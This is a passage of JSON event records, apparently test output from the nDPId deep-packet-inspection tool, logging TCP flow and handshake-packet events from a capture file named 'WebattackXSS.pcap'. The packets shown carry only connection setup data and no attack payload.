+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7681,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":3,"flow_last_seen":1499347891537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347891537,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JsRAAD4GnxSsEAABwKgKMoP2AFBiQUjj8DTaSIAQAOVSKwAAAQEICgE8biED5j+V"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347894093,"flow_last_seen":1499347894093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347894093,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1499347894093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347894093,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W6ZAAD4GaiqsEAABwKgKMoQQAFDdYCsGAAAAAKACchBgYAAAAgQFtAQCCAoBPHCgAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":2,"flow_last_seen":1499347894093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347894093,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhBBGWrmb3WArB6AScSAbTwAAAgQFtAQCCAoD5kIUATxwoAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":3,"flow_last_seen":1499347894094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347894094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W6dAAD4GajGsEAABwKgKMoQQAFDdYCsHRlq5nIAQAOW6VgAAAQEICgE8cKAD5kIU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347895396,"flow_last_seen":1499347895396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895396,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1499347895396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347895396,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+PRAAD4GzNusEAABwKgKMoQeAFBBmIkSAAAAAKACchCcyAAAAgQFtAQCCAoBPHHmAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":2,"flow_last_seen":1499347895397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347895397,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhB6fI8DwQZiJE6AScSD2UgAAAgQFtAQCCAoD5kNaATxx5gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":3,"flow_last_seen":1499347895397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347895397,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+PVAAD4GzOKsEAABwKgKMoQeAFBBmIkTnyPA8YAQAOWVWgAAAQEICgE8ceYD5kNa"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347896716,"flow_last_seen":1499347896716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347896716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1499347896716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347896716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SsxAAD4GewSsEAABwKgKMoQsAFDW1Dn8AAAAAKACchBVSgAAAgQFtAQCCAoBPHMwAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":2,"flow_last_seen":1499347896716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347896716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhCxEXQKe1tQ5\/aAScSDGowAAAgQFtAQCCAoD5kSkATxzMAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":3,"flow_last_seen":1499347896717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347896717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ss1AAD4GewusEAABwKgKMoQsAFDW1Dn9RF0Cn4AQAOVlqwAAAQEICgE8czAD5kSk"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347899275,"flow_last_seen":1499347899275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347899275,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1499347899275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347899275,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zuFAAD4G9u6sEAABwKgKMoRGAFBlPbtRAAAAAKACchBC8gAAAgQFtAQCCAoBPHWwAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":2,"flow_last_seen":1499347899275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347899275,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhEbZtc2dZT27UqAScSBRcwAAAgQFtAQCCAoD5kckATx1sAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":3,"flow_last_seen":1499347899276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347899276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zuJAAD4G9vWsEAABwKgKMoRGAFBlPbtS2bXNnoAQAOXwegAAAQEICgE8dbAD5kck"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347900544,"flow_last_seen":1499347900544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347900544,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1499347900544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347900544,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8T6pAAD4GdiasEAABwKgKMoRUAFAKnjlHAAAAAKACchAeUQAAAgQFtAQCCAoBPHbtAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":2,"flow_last_seen":1499347900544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347900544,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhFRwu76qCp45SKAScSCjggAAAgQFtAQCCAoD5khhATx27QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":3,"flow_last_seen":1499347900544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347900544,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0T6tAAD4Gdi2sEAABwKgKMoRUAFAKnjlIcLu+q4AQAOVCigAAAQEICgE8du0D5khh"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7773,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347903125,"flow_last_seen":1499347903125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347903125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7773,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1499347903125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347903125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Iy1AAD4GoqOsEAABwKgKMoRuAFDn\/lpfAAAAAKACchAdOQAAAgQFtAQCCAoBPHlyAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":2,"flow_last_seen":1499347903125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347903125,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhG41OTml5\/5aYKAScSBgbQAAAgQFtAQCCAoD5krmATx5cgEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7775,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":3,"flow_last_seen":1499347903125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347903125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Iy5AAD4GoqqsEAABwKgKMoRuAFDn\/lpgNTk5poAQAOX\/dAAAAQEICgE8eXID5krm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347904387,"flow_last_seen":1499347904387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347904387,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1499347904387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347904387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wAJAAD4GBc6sEAABwKgKMoR8AFDhZ7qvAAAAAKACchDCNgAAAgQFtAQCCAoBPHqtAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":2,"flow_last_seen":1499347904387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347904387,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhHxZjS4N4We6sKAScSDrcgAAAgQFtAQCCAoD5kwiATx6rQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":3,"flow_last_seen":1499347904387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347904387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wANAAD4GBdWsEAABwKgKMoR8AFDhZ7qwWY0uDoAQAOWKeQAAAQEICgE8eq4D5kwi"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347905694,"flow_last_seen":1499347905694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1499347905694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347905694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dZJAAD4GUD6sEAABwKgKMoSKAFAcIA5mAAAAAKACchAycwAAAgQFtAQCCAoBPHv0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7795,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":2,"flow_last_seen":1499347905694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347905694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhIr8f9XqHCAOZ6AScSAPmAAAAgQFtAQCCAoD5k1pATx79AEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7796,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":3,"flow_last_seen":1499347905695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347905695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dZNAAD4GUEWsEAABwKgKMoSKAFAcIA5n\/H\/V64AQAOWunwAAAQEICgE8e\/QD5k1p"} 